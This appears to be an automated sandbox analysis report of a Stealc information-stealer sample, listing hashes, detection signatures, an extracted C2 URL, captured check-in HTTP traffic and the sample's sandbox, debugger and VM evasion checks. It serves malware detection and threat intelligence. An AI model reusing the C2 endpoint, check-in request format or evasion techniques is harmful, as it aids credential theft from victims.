Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1523618
MD5:ed976a68fbf288f214e53f8ee4734fcc
SHA1:a67a4f8e2e21d8d8721a7eafdb2a13655854e4f1
SHA256:538f1b2469163b43d505e8d7f15b9618fc25834aa3b2ebe3f452b120120250cd
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5776 cmdline: "C:\Users\user\Desktop\file.exe" MD5: ED976A68FBF288F214E53F8EE4734FCC)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2081293607.00000000017EE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.2039233815.0000000005340000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 5776JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 5776JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.fe0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-01T20:54:59.674785+020020442431Malware Command and Control Activity Detected192.168.2.549704185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.fe0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FEC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00FEC820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00FE9AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00FE7240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE9B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00FE9B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00FF8EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00FF38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FF4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FEDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00FEDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FEE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00FEE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00FF4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FEED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00FEED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FE16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FEF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FEF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00FF3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FEF68A FindFirstFileA,0_2_00FEF68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FEBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00FEBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FEDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FEDE10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBGHJEBKJEGHJKECAAKJHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 42 36 34 32 46 41 44 42 45 31 45 32 36 34 33 30 39 35 39 34 32 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 2d 2d 0d 0a Data Ascii: ------DBGHJEBKJEGHJKECAAKJContent-Disposition: form-data; name="hwid"2B642FADBE1E2643095942------DBGHJEBKJEGHJKECAAKJContent-Disposition: form-data; name="build"doma------DBGHJEBKJEGHJKECAAKJ--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE6280 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00FE6280
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBGHJEBKJEGHJKECAAKJHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 42 36 34 32 46 41 44 42 45 31 45 32 36 34 33 30 39 35 39 34 32 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 2d 2d 0d 0a Data Ascii: ------DBGHJEBKJEGHJKECAAKJContent-Disposition: form-data; name="hwid"2B642FADBE1E2643095942------DBGHJEBKJEGHJKECAAKJContent-Disposition: form-data; name="build"doma------DBGHJEBKJEGHJKECAAKJ--
                Source: file.exe, 00000000.00000002.2081293607.00000000017EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.2081293607.0000000001847000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2081293607.00000000017EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.2081293607.0000000001847000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/H
                Source: file.exe, 00000000.00000002.2081293607.0000000001847000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2081293607.00000000017EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2081293607.0000000001847000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php1
                Source: file.exe, 00000000.00000002.2081293607.0000000001847000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php8
                Source: file.exe, 00000000.00000002.2081293607.0000000001847000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpQ
                Source: file.exe, 00000000.00000002.2081293607.0000000001862000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpc
                Source: file.exe, 00000000.00000002.2081293607.0000000001847000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpe
                Source: file.exe, 00000000.00000002.2081293607.0000000001847000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpy
                Source: file.exe, 00000000.00000002.2081293607.00000000017EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/t1
                Source: file.exe, 00000000.00000002.2081293607.00000000017EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37Tz

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013AA0A60_2_013AA0A6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013BB8F50_2_013BB8F5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013AE2620_2_013AE262
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013B324A0_2_013B324A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_014722960_2_01472296
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013AFD4B0_2_013AFD4B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013AAC7E0_2_013AAC7E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013BDC460_2_013BDC46
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012E7CB40_2_012E7CB4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013B675F0_2_013B675F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013B179C0_2_013B179C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01382F8B0_2_01382F8B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013AC7860_2_013AC786
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0146A67E0_2_0146A67E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013BEE9B0_2_013BEE9B
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00FE45C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: sixuqxru ZLIB complexity 0.9947944303365677
                Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                Source: file.exe, 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2039233815.0000000005340000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00FF8680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00FF3720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\0BQY61N2.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1844736 > 1048576
                Source: file.exeStatic PE information: Raw size of sixuqxru is bigger than: 0x100000 < 0x19c400

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.fe0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;sixuqxru:EW;exgbaerq:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;sixuqxru:EW;exgbaerq:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00FF9860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1cfe12 should be: 0x1cd2d5
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: sixuqxru
                Source: file.exeStatic PE information: section name: exgbaerq
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0143E142 push 72FD8CA7h; mov dword ptr [esp], eax0_2_0143E192
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0143E142 push 48B58678h; mov dword ptr [esp], eax0_2_0143E1C3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01375900 push ebx; mov dword ptr [esp], edi0_2_0137592A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01375900 push ebx; mov dword ptr [esp], 66807FE3h0_2_0137596E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_014AA13F push ebp; mov dword ptr [esp], eax0_2_014AA198
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01456939 push 03149145h; mov dword ptr [esp], ebp0_2_0145699F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013819A4 push ebp; mov dword ptr [esp], ecx0_2_01381A04
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013819A4 push eax; mov dword ptr [esp], edx0_2_01381A18
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013819A4 push ebx; mov dword ptr [esp], 3F9F6BB9h0_2_01381A1C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013819A4 push 4DEEC901h; mov dword ptr [esp], edx0_2_01381A29
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013819A4 push 55362D82h; mov dword ptr [esp], ecx0_2_01381A31
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013819A4 push ecx; mov dword ptr [esp], eax0_2_01381A3D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0143A1DC push 06B67C1Eh; mov dword ptr [esp], edi0_2_0143A206
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0126A986 push esi; mov dword ptr [esp], 3FAD7622h0_2_0126A9E4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_014969E9 push 222D7BBEh; mov dword ptr [esp], esi0_2_01496A34
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_014969E9 push ecx; mov dword ptr [esp], ebx0_2_01496AB8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_014431E2 push 1169E311h; mov dword ptr [esp], edx0_2_014431F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01471981 push ebx; mov dword ptr [esp], edi0_2_01471995
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01471981 push 62EAAA28h; mov dword ptr [esp], esi0_2_01471A1E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FFB035 push ecx; ret 0_2_00FFB048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0145C98A push edx; mov dword ptr [esp], eax0_2_0145C9CA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013E91E9 push 02D31383h; mov dword ptr [esp], ebp0_2_013E9942
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013DA9D3 push esi; mov dword ptr [esp], edi0_2_013DA9B7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013DA9D3 push 6D3E0A73h; mov dword ptr [esp], eax0_2_013DAA5B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01489077 push 0558A818h; mov dword ptr [esp], esi0_2_01489690
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01440806 push ebp; mov dword ptr [esp], esi0_2_0144082B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_014A28C0 push 1BC7251Ch; mov dword ptr [esp], ecx0_2_014A28DF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_014A28C0 push ebp; mov dword ptr [esp], ecx0_2_014A28F9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013AA0A6 push eax; mov dword ptr [esp], ebx0_2_013AA0EC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013AA0A6 push 71F621B4h; mov dword ptr [esp], edi0_2_013AA1D4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013AA0A6 push eax; mov dword ptr [esp], ecx0_2_013AA269
                Source: file.exeStatic PE information: section name: sixuqxru entropy: 7.952856690004543

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00FF9860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13659
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C467C second address: 13C4682 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C3C13 second address: 13C3C1D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F11F8D51842h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C3C1D second address: 13C3C23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C3DAF second address: 13C3DBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jo 00007F11F8D5183Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C3DBC second address: 13C3DDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 je 00007F11F8F18C26h 0x0000000d pop eax 0x0000000e jmp 00007F11F8F18C31h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C58CA second address: 13C58D4 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F11F8D51836h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
